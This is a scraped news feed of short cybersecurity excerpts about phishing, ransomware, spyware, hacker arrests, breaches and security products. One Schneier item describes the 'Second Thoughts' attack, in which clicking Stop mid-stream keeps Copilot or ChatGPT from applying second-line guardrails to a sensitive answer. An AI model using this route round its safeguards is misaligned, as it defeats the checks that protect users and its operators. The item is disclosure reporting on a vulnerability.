Top cybersecurity books for your holiday gift list Top cybersecurity books for your holiday gift list

To help with ideas on what to give, we’ve compiled a list of cybersecurity books to consider.

Author: Richard StiennonIn the book, you’ll find a comprehensive directory of cybersecurity vendors, updated for 2024, complete with headquarters location, category, sub-category, number of employees, and growth trends.

Whether you’re concerned about secure password practices, safeguarding your privacy, or defending against cyber attacks, this book covers it all.

Author: Steve WilsonThis book delivers practical strategies to help developers and security teams grapple with the realities of LLM applications.

Authors: Robert Lelewski and John HollenbergerWritten by veteran security consultants, this b…

2 часа назад @ helpnetsecurity.com
Businesses plagued by constant stream of malicious emails
Businesses plagued by constant stream of malicious emails Businesses plagued by constant stream of malicious emails

36.9% of all emails received by businesses (20.5 billion) in 2024 were unwanted, according to Hornetsecurity’s analysis of 55.6+ billion emails processed through their security services between November 1, 2023 and October 31, 2024 – and 2.3% of those contained malicious content, totalling 427.8 million emails.

Once again, phishing remains the most prevalent form of attack, responsible for a third of all cyber-attacks in 2024.

This was confirmed by the analysis of 55.6 billion emails, showing that phishing remains a top concern consistently year over year.

“With over 427 million malicious emails still reaching inboxes, it’s clear that cybersecurity strategies must evolve to stay ahead of in…

2 часа назад @ helpnetsecurity.com
Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast
Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast Week in review: Veeam Service Provider Console flaws fixed, Patch Tuesday forecast

December 2024 Patch Tuesday forecast: The secure future initiative impactIt seems like 2024 just started, but the final Patch Tuesday of the year is almost here!

SafeLine: Open-source web application firewall (WAF)SafeLine is an open-source and self-hosted Web Application Firewall (WAF) that protects websites from cyber attacks.

Inside the 2024 CWE Top 25: Trends, surprises, and persistent challengesIn this Help Net Security interview, Alec Summers, Project Leader for the CVE Program at MITRE, shares his insights on the 2024 CWE top 25 most dangerous software weaknesses.

US government, energy sector contractor hit by ransomwareENGlobal, a Texas-based engineering and automation contractor fo…

21 час назад @ helpnetsecurity.com
Resecurity introduces AI-powered GSOC at NATO Edge 2024
Resecurity introduces AI-powered GSOC at NATO Edge 2024 Resecurity introduces AI-powered GSOC at NATO Edge 2024

Resecurity, a global leader in cybersecurity solutions, unveiled its advanced Government Security Operations Center (GSOC) during NATO Edge 2024, the NATO Communications and Information Agency’s flagship conference.

GSOC: A modern approach to cybersecurityThe Government Security Operations Center (GSOC) is a centralized hub for cybersecurity monitoring, threat detection, and response coordination.

Key benefits of the GSOC include:Unified security monitoring : By consolidating security operations, GSOC provides a holistic view of all potential threats across critical systems, such as energy grids, transportation networks, and communication platforms.

: By consolidating security operations, G…

2 days, 17 hours назад @ helpnetsecurity.com
Windows, macOS users targeted with crypto-and-info-stealing malware
Windows, macOS users targeted with crypto-and-info-stealing malware Windows, macOS users targeted with crypto-and-info-stealing malware

Case in point: Cado Security Labs researchers have recently reported websites set up to impersonate companies offering a video conferencing app, but serving/pushing the Realst info-stealer.

The Telegram account was created to impersonate a contact of the target, Cado researchers said, and the scammer even sent an investment presentation from the target’s company to the target.

The download page of the Meeten website (Source: Cado Security Lab)“The company regularly changes names, has also gone by Clusee[.

The malwareTha fake apps are actually macOS and Windows variants of the Realst infostealer, which was first discovered in 2023 by security researcher iamdeadlyz.

“During our research we di…

2 days, 19 hours назад @ helpnetsecurity.com
Echoworx enhances secure access to encrypted messages
Echoworx enhances secure access to encrypted messages Echoworx enhances secure access to encrypted messages

Echoworx announced the addition of 2-Step Verification (2SV) when using OAuth and Passkeys for authentication for encrypted messages.

This latest enhancement offers organizations an additional layer of security, addressing the growing demand for identity-first security measures during a time of heightened risks to sensitive information, including political and corporate data.

This update aligns with the increasing adoption of passwordless authentication, which Gartner predicts will be used daily by over 50% of the workforce by 2025.

The new feature allows organizations to enforce 2SV for methods that were previously exempt from such prompts, offering both enhanced security and streamlined u…

2 days, 19 hours назад @ helpnetsecurity.com
How to choose secure, verifiable technologies?
How to choose secure, verifiable technologies? How to choose secure, verifiable technologies?

The Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) has published a guidance document titled Choosing Secure and Verifiable Technologies, compiled to assist organizations in making informed decisions when procuring software (proprietary or open source), hardware (e.g., IoT devices), and cloud services (SaaS, MSP services).

It offers insight into supply chain attack vectors and evolving cyber threats, and offers guidance on pre-purchase and post-purchase risk management strategies.

It offers insight into supply chain attack vectors and evolving cyber threats, and offers guidance on pre-purchase and post-purchase risk management strategies.

Steps to align procur…

2 days, 20 hours назад @ helpnetsecurity.com
December 2024 Patch Tuesday forecast: The secure future initiative impact
December 2024 Patch Tuesday forecast: The secure future initiative impact December 2024 Patch Tuesday forecast: The secure future initiative impact

There are several issues Microsoft has been dealing with this month that you need to be aware of.

They pulled and then re-released the November 2024 Exchange Server Security Update packages.

Per Microsoft, there were reported issues with Exchange Server transport rules stopping after a period of time.

For the gamers in the crowd, there are also reported issues with regards to running Ubisoft games like Assassin’s Creed.

Speaking of Windows 11 24H2, Microsoft announced the preview program for hotpatching both Windows 11 Enterprise 24H2 and Windows 365 Enterprise.

3 days назад @ helpnetsecurity.com
Teenagers leading new wave of cybercrime
Teenagers leading new wave of cybercrime Teenagers leading new wave of cybercrime

Global data breaches show no signs of slowing down as this year has already exceeded 2023 in the number of data breaches and consumers impacted, according to Experian.

Younger cybercriminals on the riseToday, the world of cyber hacking is not confined to grown ups nor is the fallout.

According to the FBI, the average age of someone arrested for cybercrime is 19 vs. 37 for any crime.

Many teens will have been recruited into the “business” by more sophisticated fraudsters, who reach them through online gaming, chat and social media.

Next year could see at least one global brand impacted by fraud perpetrated by an insider to whom it provided educational AI training.

3 days, 1 hour назад @ helpnetsecurity.com
Building a robust security posture with limited resources
Building a robust security posture with limited resources Building a robust security posture with limited resources

Senior business leaders can effectively align innovation goals with cybersecurity by embedding security into the innovation process from the outset.

Collaboration between security teams and business units is critical, ensuring cybersecurity considerations are integral to strategic discussions rather than an afterthought.

Utilising managed security services can alleviate the operational burden on internal teams, allowing them to focus on innovation while maintaining robust security.

Automation in security operations will further ease the burden on security teams, streamlining processes such as incident response and threat intelligence gathering.

By embracing these advancements, businesses ca…

3 days, 1 hour назад @ helpnetsecurity.com
GenAI makes phishing attacks more believable and cost-effective
GenAI makes phishing attacks more believable and cost-effective GenAI makes phishing attacks more believable and cost-effective

“Undoubtedly, GenAI equips cybersecurity professionals with powerful tools, but it also provides attackers with advanced capabilities.

But curiously, security professionals are much more likely — 6x more likely, in fact — to say AI tools will primarily benefit employers, not employees.

Security professionals doubt AI benefits for their rolesIvanti’s research shows that 1 in 3 security professionals cite a lack of skill and talent as a major challenge.

To bring employees along, companies must invest in upskilling their cybersecurity teams, using strategies such as interactive learning opportunities and attack simulations.

And given the evolution of AI tools, training must be ongoing and cont…

3 days, 2 hours назад @ helpnetsecurity.com
New infosec products of the week: December 6, 2024
New infosec products of the week: December 6, 2024 New infosec products of the week: December 6, 2024

Here’s a look at the most interesting products from the past week, featuring releases from Datadog, Fortinet, Radiant Logic, Sweet Security, Tenable, and Veza.

FortiAppSec Cloud simplifies web application security managementWith FortiAppSec Cloud, customers have deep visibility and control over web applications within their complex, multi-cloud environments.

Radiant Logic provides continuous identity hygiene assessments via real-time streaming dataWith the debut of Identity Observability from Radiant Logic, organizations can now have a clearer picture of all identity data available in real time, quickly measure identity hygiene, and remediate risk with the help of Radiant Logic AI Data Assi…

3 days, 2 hours назад @ helpnetsecurity.com
Law enforcement shuts down Manson Market cybercrime marketplace
Law enforcement shuts down Manson Market cybercrime marketplace Law enforcement shuts down Manson Market cybercrime marketplace

The stolen data was traced back to a specialised online marketplace (called Manson Market) that operated as a central hub for the trade of illegally obtained information.

The marketplace allowed its thousands of users to buy stolen data sorted by region and account balance.

Law enforcement seized over 50 servers, securing more than 200 terabytes of digital evidence.

During the action day, three European Cybercrime Centre (EC3) experts were deployed to Germany and Austria to assist the national authorities in their enforcement actions.

Europol has also helped French and Dutch law enforcement investigate and recently dismantle Matrix, an encrypted chat service created by criminals for crimina…

3 days, 15 hours назад @ helpnetsecurity.com
IT Security Guru IT Security Guru
последний пост 3 months, 2 weeks назад
How Immigration Can Solve America’s Cybersecurity Shortage
How Immigration Can Solve America’s Cybersecurity Shortage How Immigration Can Solve America’s Cybersecurity Shortage

The Growing Cybersecurity Skills GapThe cybersecurity landscape is more complex and dangerous than ever before.

Immigration: A Solution to the Cybersecurity ShortageImmigration can help solve the cybersecurity skills shortage in several ways.

Although immigration was highlighted as a crucial element in the policy to mitigate the cybersecurity talent shortage, meaningful immigration reform by Congress is essential for the successful implementation of this strategy.

These experts can help train the next generation of American cybersecurity professionals, ensuring that the U.S. remains at the forefront of global cybersecurity for decades to come.

ConclusionThe cybersecurity skills shortage is …

3 months, 2 weeks назад @ itsecurityguru.org
Cybereason Unveils SDR Data Ramp Program: Analyse and Detect Threats in 1TB of Log Data for 90 Days
Cybereason Unveils SDR Data Ramp Program: Analyse and Detect Threats in 1TB of Log Data for 90 Days Cybereason Unveils SDR Data Ramp Program: Analyse and Detect Threats in 1TB of Log Data for 90 Days

Cybereason has launched its revolutionary SDR Data Ramp Programme with Observe.

This ensures that customers can experience the full capabilities of Cybereason’s SDR product, which is designed to detect, analyse, and respond to cyber threats with unparalleled accuracy and speed, reducing the need for legacy SIEM platforms.

“The 1TB Free SDR Data Ramp Programme underscores our commitment to empowering organisations with the tools they need to defend against increasingly sophisticated cyber threats.

This multi-layered approach enables security teams to identify and mitigate threats more effectively, reducing the time to detect and respond to incidents.

To learn more about Cybereason’s 1TB Free…

3 months, 2 weeks назад @ itsecurityguru.org
The 8 Most Common Website Design Mistakes According to Pros
The 8 Most Common Website Design Mistakes According to Pros The 8 Most Common Website Design Mistakes According to Pros

Even seasoned professionals stumble upon common pitfalls that can impact user experience and, consequently, a site’s success.

With expertise from website design company, Full Stack Industries, we will explore common design mistakes and how to avoid them.

This inclusive step means all audiences can experience your site and will also improve your search engine rankings.

Final ThoughtsKeeping these common website design mistakes at bay can significantly elevate your online presence.

By prioritising user experience, accessibility, and clear communication, you’ll create a site that looks great and effectively serves its users.

3 months, 2 weeks назад @ itsecurityguru.org
Dodging the Cyber Bullet: Early Signs of a Ransomware Attack
Dodging the Cyber Bullet: Early Signs of a Ransomware Attack Dodging the Cyber Bullet: Early Signs of a Ransomware Attack

Encrypting a few devices to test their strategy is a red flag that a more significant ransomware assault is imminent and demands immediate action.

By staying alert to these signs and responding promptly, organisations can better defend against the escalating threat of ransomware attacks.

Poorly Managed Remote Desktop Protocol ConnectionsRemote Desktop Protocol (RDP) connections, if not properly managed, can be an entry point for ransomware attacks.

Sectors Prone to Ransomware AttacksSpecific sectors are particularly vulnerable to ransomware attacks thanks to the critical nature of their operations.

Here are the sectors most commonly targeted:The healthcare sector is a prime target for ranso…

3 months, 3 weeks назад @ itsecurityguru.org
Cyber insurance claims fall as businesses refuse ransom payments and recover themselves
Cyber insurance claims fall as businesses refuse ransom payments and recover themselves Cyber insurance claims fall as businesses refuse ransom payments and recover themselves

Databarracks’ Data Health Check – an annual survey of 500 UK IT decision makers – found that while more organisations than ever have cyber insurance, the number of claims is down.

66% of those surveyed report having insurance specifically for cyber in 2024, rising from 51% over the past two years.

James Watts, Managing Director at Databarracks, commented:“We have long speculated about the negative effect of cyber insurance policies on ransomware.

The nascent cyber insurance market suddenly became unsustainable.

As our Data Health Check found last year, cyber insurance prices increased significantly and the requirements to obtain cover became stricter.

3 months, 3 weeks назад @ itsecurityguru.org
AI-powered cyber threats are too overpowering for over 50% of security teams
AI-powered cyber threats are too overpowering for over 50% of security teams AI-powered cyber threats are too overpowering for over 50% of security teams

According to research from Absolute Security, over half (54%) of Chief Information Security Officers (CISOs) feel their security team is unprepared for evolving AI-powered threats.

The findings were uncovered in the Absolute Security United Kingdom CISO Cyber Resilience Report 2024, which surveyed 250 UK CISOs at enterprise organisations to assess the state of cyber resilience, AI, and the cyber threat landscape in the UK.

Almost half (46%) of CISOs believe that AI is more of a threat to their organisation’s cyber resilience than a help, highlighting AI as a potential danger in safeguarding organisations from cyber threats rather than strengthening cyber resilience.

As AI-driven cyber threa…

3 months, 3 weeks назад @ itsecurityguru.org
New Threat Report from Cato Networks Uncovers Threat Actor Selling Data and Source Code from Major Brands
New Threat Report from Cato Networks Uncovers Threat Actor Selling Data and Source Code from Major Brands New Threat Report from Cato Networks Uncovers Threat Actor Selling Data and Source Code from Major Brands

The report found that threat actors are selling data and source code from major brands on the dark web.

Given the popularity of Amazon, users should be wary of threat actors creating counterfeit websites that ask to submit sensitive information.

Log4j remains a popular vulnerability that threat actors attempt to exploitThree years after its discovery in 2021, Log4j remains one of the most used vulnerabilities leveraged by threat actors.

Inbound traffic is traffic that doesn’t originate from within the network, while WANbound traffic resides within a WAN environment.

“With the Q2 2024 Cato CTRL SASE Threat Report, we are putting the spotlight on a notorious threat actor named IntelBroker.

3 months, 3 weeks назад @ itsecurityguru.org
New Post Quantum Cryptography Standards Poised to Revolutionize Cybersecurity
New Post Quantum Cryptography Standards Poised to Revolutionize Cybersecurity New Post Quantum Cryptography Standards Poised to Revolutionize Cybersecurity

The National Institute of Standards and Technology (NIST) has officially published its highly anticipated Federal Information Processing Standards (FIPS) for post-quantum cryptography (PQC).

The algorithms announced today represent the first finalized standards from NIST’s PQC standardization project and are now ready for immediate implementation.

Today’s announcement takes place within a larger regulatory framework, including the White House’s National Security Memorandum, NSM-8, which requires the adoption of post-quantum cryptography (PQC).

Today’s quantum computers are small and experimental, but they are rapidly becoming more capable, and it is only a matter of time before cryptographi…

3 months, 3 weeks назад @ itsecurityguru.org
Kicking cyber security down the road can come back to bite you
Kicking cyber security down the road can come back to bite you Kicking cyber security down the road can come back to bite you

Yet despite the clear and present danger, some businesses continue to deprioritise cyber security, with a concerning 15% failing to invest in cyber security measures.

An overshadowed priorityDespite a shared understanding of cyber threats among security leaders and C-suite, cyber security often gets overlooked.

Alarmingly, a third of security leaders only prioritise cyber security expertise after an attack has happened.

Securing buy-inTo ensure cyber security is prioritised, it is vital to convey to the C-suite the very real implications of not mitigating cyber security risks.

It is time to implement cyber security measures nowBy deprioritising cyber security, businesses are essentially def…

3 months, 3 weeks назад @ itsecurityguru.org
What skills can cyber security experts develop to adapt to AI and quantum computing?
What skills can cyber security experts develop to adapt to AI and quantum computing? What skills can cyber security experts develop to adapt to AI and quantum computing?

High levels of demand for cyber security expertise also means that it’s one of the best paying roles in tech with a great level of job security.

However, cyber security professionals are in a never-ending arms race with hackers.

On the other side, AI also has the capacity to create an arsenal of new offensive and defensive tools for cyber security experts.

Quantum computingLike AI, Quantum has the capacity to utterly transform how we all live and work.

Ambitious cyber security professionals could become trail blazers in this sector if they start acquiring relevant skills now.

3 months, 4 weeks назад @ itsecurityguru.org
HealthEquity Data Breach Compromises Customer Information
HealthEquity Data Breach Compromises Customer Information

HealthEquity, a leading provider of health savings account (HSA) services, has announced it suffered a data breach recently, resulting in compromised customer protected health information (PHI). It is understood the breach was detected on March 25, 2024, after abnormal activity was flagged from a business partner’s device. Once an investigation was carried out, it was […]

The post HealthEquity Data Breach Compromises Customer Information first appeared on IT Security Guru.

The post HealthEquity Data Breach Compromises Customer Information appeared first on IT Security Guru.

4 months, 1 week назад @ itsecurityguru.org
Accenture and SandboxAQ Expand Cybersecurity Partnership
Accenture and SandboxAQ Expand Cybersecurity Partnership

Today, Accenture (NYSE: ACN) and SandboxAQ have announced that they are expanding their partnership to address the critical need for enterprise data encryption that can defend against current data breaches, as well as future AI and quantum threats. Together, Accenture and SandboxAQ are helping organisations secure sensitive data and strengthen encryption across their technology portfolios. […]

The post Accenture and SandboxAQ Expand Cybersecurity Partnership first appeared on IT Security Guru.

The post Accenture and SandboxAQ Expand Cybersecurity Partnership appeared first on IT Security Guru.

4 months, 1 week назад @ itsecurityguru.org
People Overconfident in Password Habits, Overwhelmed by Too Many Passwords
People Overconfident in Password Habits, Overwhelmed by Too Many Passwords

New research by Keeper Security has revealed some worrying trends and misunderstandings when it comes to password best practices and overconfidence in cyber knowledge. The research found that, while 85% of respondents believe their passwords are secure, over half admit to sharing their passwords. Additionally, 64% of people feel confident in their cybersecurity knowledge despite […]

The post People Overconfident in Password Habits, Overwhelmed by Too Many Passwords first appeared on IT Security Guru.

The post People Overconfident in Password Habits, Overwhelmed by Too Many Passwords appeared first on IT Security Guru.

4 months, 1 week назад @ itsecurityguru.org
Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester
Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester

Technology is advancing rapidly and tokenized payment cards are a part of its evolution. Gone are the days of keying in long card numbers, expiry dates and CVV codes and hoping for the best. Instead, tokenized cards offer heightened security and improved transaction processes for digital payments. But what are they all about and how […]

The post Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester first appeared on IT Security Guru.

The post Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester appeared first on IT Security Guru.

4 months, 1 week назад @ itsecurityguru.org
Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands
Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands

New threat research by Salt-Labs, the research arm of API security company Salt Security, has released new research highlighting critical security flaws within popular web analytics provider Hotjar. The company serves over one million websites, including global brands like Microsoft and Nintendo (according to their website). These vulnerabilities could have potentially allowed an attacker unlimited […]

The post Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands first appeared on IT Security Guru.

The post Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands appeared first on…

4 months, 1 week назад @ itsecurityguru.org
SecurityTrails
последний пост None
Блоги 👨‍💻
Бизнес без опасности Бизнес без опасности
последний пост None
Жизнь 80 на 20 Жизнь 80 на 20
последний пост None
ZLONOV ZLONOV
последний пост None
Блог Артема Агеева Блог Артема Агеева
последний пост None
Киберпиздец Киберпиздец
последний пост None
Schneier on Security Schneier on Security
последний пост 2 days, 8 hours назад
Friday Squid Blogging: Safe Quick Undercarriage Immobilization Device
Friday Squid Blogging: Safe Quick Undercarriage Immobilization Device Friday Squid Blogging: Safe Quick Undercarriage Immobilization Device

They just won’t stop unless persuaded­—persuaded by bullets, barriers, spikes, or snares.

Spike his tires, and he might fishtail into a van­—if the spikes stop him at all.

But what if an officer could lay down a road trap in seconds, then activate it from a nearby hiding place?

What if this trap were as small as a spare tire, as light as a tire jack, and cost under a grand?

By stopping the axles instead of the wheels, SQUID may change how fleeing drivers are, quite literally, caught.

2 days, 8 hours назад @ schneier.com
Detecting Pegasus Infections
Detecting Pegasus Infections Detecting Pegasus Infections

The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection.

For paying iVerify customers, the tool regularly checks devices for potential compromise.

But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1.

These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours.

Free users can use the tool once a month.

2 days, 18 hours назад @ schneier.com
AI and the 2024 Elections
AI and the 2024 Elections AI and the 2024 Elections

There are real concerns and risks in using AI in electoral politics, but it definitely has not been all bad.

Local governments in Japan and California and prominent politicians, including India Prime Minister Narenda Modi and New York City Mayor Eric Adams, used AI to translate meetings and speeches to their diverse constituents.

Other candidates used AI’s conversational capabilities to connect with voters.

In Argentina in 2023, both major presidential candidates used AI to develop campaign posters, videos and other materials.

In the U.S., for example, a Georgia politician used AI to produce blog posts, campaign images and podcasts.

4 days, 18 hours назад @ schneier.com
Algorithms Are Coming for Democracy—but It’s Not All Bad
Algorithms Are Coming for Democracy—but It’s Not All Bad Algorithms Are Coming for Democracy—but It’s Not All Bad

We are also starting to see AI tools aid fundraising and get-out-the-vote efforts.

At the national level, AI tools are more likely to make the already powerful even more powerful.

Human + AI generally beats AI only: The more human talent you have, the more you can effectively make use of AI assistance.

We will see AI systems optimized for different parties and ideologies; for one faction not to trust the AIs of a rival faction; for everyone to have a healthy suspicion of corporate for-profit AI systems with hidden biases.

Politicians and campaigns will start using AI tools when they are useful.

5 days, 18 hours назад @ schneier.com
Details about the iOS Inactivity Reboot Feature
Details about the iOS Inactivity Reboot Feature Details about the iOS Inactivity Reboot Feature

Details about the iOS Inactivity Reboot FeatureI recently wrote about the new iOS feature that forces an iPhone to reboot after it’s been inactive for a longish period of time.

Here are the technical details, discovered through reverse engineering.

The feature triggers after seventy-two hours of inactivity, even it is remains connected to Wi-Fi.

Posted on December 2, 2024 at 7:08 AM • 0 Comments

6 days, 18 hours назад @ schneier.com
Friday Squid Blogging: Squid-Inspired Needle Technology
Friday Squid Blogging: Squid-Inspired Needle Technology Friday Squid Blogging: Squid-Inspired Needle Technology

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

1 week, 2 days назад @ schneier.com
Race Condition Attacks against LLMs
Race Condition Attacks against LLMs Race Condition Attacks against LLMs

[…]When confronted with a sensitive topic, Microsoft 365 Copilot and ChatGPT answer questions that their first-line guardrails are supposed to stop.

We call this attack “Second Thoughts.”[…]After asking the LLM a question, if the user clicks the Stop button while the answer is still streaming, the LLM will not engage its second-line guardrails.

As a result, the LLM will provide the user with the answer generated thus far, even though it violates system policies.

In other words, pressing the Stop button halts not only the answer generation but also the guardrails sequence.

If the stop button isn’t pressed, then ‘Second Thoughts’ is triggered.

1 week, 2 days назад @ schneier.com
NSO Group Spies on People on Behalf of Governments
NSO Group Spies on People on Behalf of Governments NSO Group Spies on People on Behalf of Governments

NSO Group Spies on People on Behalf of GovernmentsThe Israeli company NSO Group sells Pegasus spyware to countries around the world (including countries like Saudi Arabia, UAE, India, Mexico, Morocco and Rwanda).

We assumed that those countries use the spyware themselves.

Now we’ve learned that that’s not true: that NSO Group employees operate the spyware on behalf of their customers.

Legal documents released in ongoing US litigation between NSO Group and WhatsApp have revealed for the first time that the Israeli cyberweapons maker ­ and not its government customers ­ is the party that “installs and extracts” information from mobile phones targeted by the company’s hacking software.

Posted …

1 week, 4 days назад @ schneier.com
What Graykey Can and Can’t Unlock
What Graykey Can and Can’t Unlock What Graykey Can and Can’t Unlock

This is from 404 Media:The Graykey, a phone unlocking and forensics tool that is used by law enforcement around the world, is only able to retrieve partial data from all modern iPhones that run iOS 18 or iOS 18.0.1, which are two recently released versions of Apple’s mobile operating system, according to documents describing the tool’s capabilities in granular detail obtained by 404 Media.

The documents do not appear to contain information about what Graykey can access from the public release of iOS 18.1, which was released on October 28.

1 week, 5 days назад @ schneier.com
Security Analysis of the MERGE Voting Protocol
Security Analysis of the MERGE Voting Protocol Security Analysis of the MERGE Voting Protocol

Interesting analysis: An Internet Voting System Fatally Flawed in Creative New Ways.

Abstract: The recently published “MERGE” protocol is designed to be used in the prototype CAC-vote system.

The voting kiosk and protocol transmit votes over the internet and then transmit voter-verifiable paper ballots through the mail.

In the MERGE protocol, the votes transmitted over the internet are used to tabulate the results and determine the winners, but audits and recounts use the paper ballots that arrive in time.

The enunciated motivation for the protocol is to allow (electronic) votes from overseas military voters to be included in preliminary results before a (paper) ballot is received from the …

1 week, 6 days назад @ schneier.com
Friday Squid Blogging: Transcriptome Analysis of the Indian Squid
Friday Squid Blogging: Transcriptome Analysis of the Indian Squid Friday Squid Blogging: Transcriptome Analysis of the Indian Squid

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

2 weeks, 2 days назад @ schneier.com
The Scale of Geoblocking by Nation
The Scale of Geoblocking by Nation The Scale of Geoblocking by Nation

Interesting analysis:We introduce and explore a little-known threat to digital equality and freedom­websites geoblocking users in response to political risks from sanctions.

U.S. policy prioritizes internet freedom and access to information in repressive regimes.

We conduct network measurements on the Tranco Top 10K domains and complement our findings with a small-scale user study with a questionnaire.

Notably, we identify 32 instances of blockpage responses served with 200 OK status codes, despite not returning the requested content.

Finally, we note the inefficacy of current improvement strategies and make recommendations to both service providers and policymakers to reduce Internet fragm…

2 weeks, 2 days назад @ schneier.com
Secret Service Tracking People’s Locations without Warrant
Secret Service Tracking People’s Locations without Warrant Secret Service Tracking People’s Locations without Warrant

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

2 weeks, 3 days назад @ schneier.com
Steve Bellovin’s Retirement Talk
Steve Bellovin’s Retirement Talk Steve Bellovin’s Retirement Talk

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

2 weeks, 4 days назад @ schneier.com
Why Italy Sells So Much Spyware
Why Italy Sells So Much Spyware Why Italy Sells So Much Spyware

Interesting analysis:Although much attention is given to sophisticated, zero-click spyware developed by companies like Israel’s NSO Group, the Italian spyware marketplace has been able to operate relatively under the radar by specializing in cheaper tools.

According to an Italian Ministry of Justice document, as of December 2022 law enforcement in the country could rent spyware for €150 a day, regardless of which vendor they used, and without the large acquisition costs which would normally be prohibitive.

As a result, thousands of spyware operations have been carried out by Italian authorities in recent years, according to a report from Riccardo Coluccini, a respected Italian journalist wh…

2 weeks, 5 days назад @ schneier.com
Krebs On Security
последний пост 4 days, 16 hours назад
U.S. Offered $10M for Hacker Just Arrested by Russia
U.S. Offered $10M for Hacker Just Arrested by Russia U.S. Offered $10M for Hacker Just Arrested by Russia

The U.S. government indicted Matveev as a top ransomware purveyor a year later, offering $10 million for information leading to his arrest.

Last week, the Russian government reportedly arrested Matveev and charged him with creating malware used to extort companies.

Love your country, and you will always get away with everything.”Still, Wazawaka may not have always stuck to that rule.

The men were among 14 suspected REvil members rounded up by Russia in the weeks before Russia invaded Ukraine in 2022.

Earlier this year, Russian authorities arrested at least two men for allegedly operating the short-lived Sugarlocker ransomware program in 2021.

4 days, 16 hours назад @ krebsonsecurity.com
Why Phishers Love New TLDs Like .shop, .top and .xyz
Why Phishers Love New TLDs Like .shop, .top and .xyz Why Phishers Love New TLDs Like .shop, .top and .xyz

Interisle sources data about cybercrime domains from anti-spam organizations, including the Anti-Phishing Working Group (APWG), the Coalition Against Unsolicited Commercial Email (CAUCE), and the Messaging, Malware, and Mobile Anti-Abuse Working Group (M3AAWG).

The study finds that while .com and .net domains made up approximately half of all domains registered in the past year (more than all of the other TLDs combined) they accounted for just over 40 percent of all cybercrime domains.

Interisle says an almost equal share — 37 percent — of cybercrime domains were registered through new gTLDs.

Levine said adding more TLDs without a much stricter registration policy will likely further expand…

5 days, 17 hours назад @ krebsonsecurity.com
Hacker in Snowflake Extortions May Be a U.S. Soldier
Hacker in Snowflake Extortions May Be a U.S. Soldier Hacker in Snowflake Extortions May Be a U.S. Soldier

Kiberphant0m’s identities on cybercrime forums and on Telegram and Discord chat channels have been selling data stolen from customers of the cloud data storage company Snowflake.

After scouring darknet markets for stolen Snowflake account credentials, the hackers began raiding the data storage repositories for some of the world’s largest corporations.

On BreachForums, Kiberphant0m has sold the source code to “Shi-Bot,” a custom Linux DDoS botnet based on the Mirai malware.

The Vars_Secc telegram handle also has claimed ownership of the BreachForums member “Boxfan,” and Intel 471 shows Boxfan’s early posts on the forum had the Vars_Secc Telegram account in their signature.

Reached via Telegr…

1 week, 5 days назад @ krebsonsecurity.com
Feds Charge Five Men in ‘Scattered Spider’ Roundup
Feds Charge Five Men in ‘Scattered Spider’ Roundup Feds Charge Five Men in ‘Scattered Spider’ Roundup

The five men, aged 20 to 25, are allegedly members of a hacking conspiracy dubbed “Scattered Spider” and “Oktapus,” which specialized in SMS-based phishing attacks that tricked employees at tech firms into entering their credentials and one-time passcodes at phishing websites.

The phishing kits used for these campaigns featured a hidden Telegram instant message bot that forwarded any submitted credentials in real-time.

Evans, Elbadawy, Osiebo and Urban were all charged with one count of conspiracy to commit wire fraud, one count of conspiracy, and one count of aggravated identity theft.

Buchanan, who is named as an indicted co-conspirator, was charged with conspiracy to commit wire fraud, c…

2 weeks, 3 days назад @ krebsonsecurity.com
Fintech Giant Finastra Investigating Data Breach
Fintech Giant Finastra Investigating Data Breach Fintech Giant Finastra Investigating Data Breach

The financial technology firm Finastra is investigating the alleged large-scale theft of information from its internal file transfer platform, KrebsOnSecurity has learned.

On November 8, 2024, Finastra notified financial institution customers that on Nov. 7 its security team detected suspicious activity on Finastra’s internally hosted file transfer platform.

Finastra also told customers that someone had begun selling large volumes of files allegedly stolen from its systems.

“There is no direct impact on customer operations, our customers’ systems, or Finastra’s ability to serve our customers currently,” the notice continued.

However, it did reference many of the same banks called out as Fin…

2 weeks, 5 days назад @ krebsonsecurity.com
An Interview With the Target & Home Depot Hacker
An Interview With the Target & Home Depot Hacker An Interview With the Target & Home Depot Hacker

Mr. Shefel, who recently changed his legal surname to Lenin, was the star of last year’s story, Ten Years Later, New Clues in the Target Breach.

Mr. Golubov could not be reached for comment, and Shefel says he no longer has the laptop containing evidence to support that claim.

“My nickname was MikeMike, and I worked with Dmitri Golubov and made technologies for him,” Shefel said.

“Helkern was my friend, I [set up a] meeting with Golubov and him in 2013,” Shefel said.

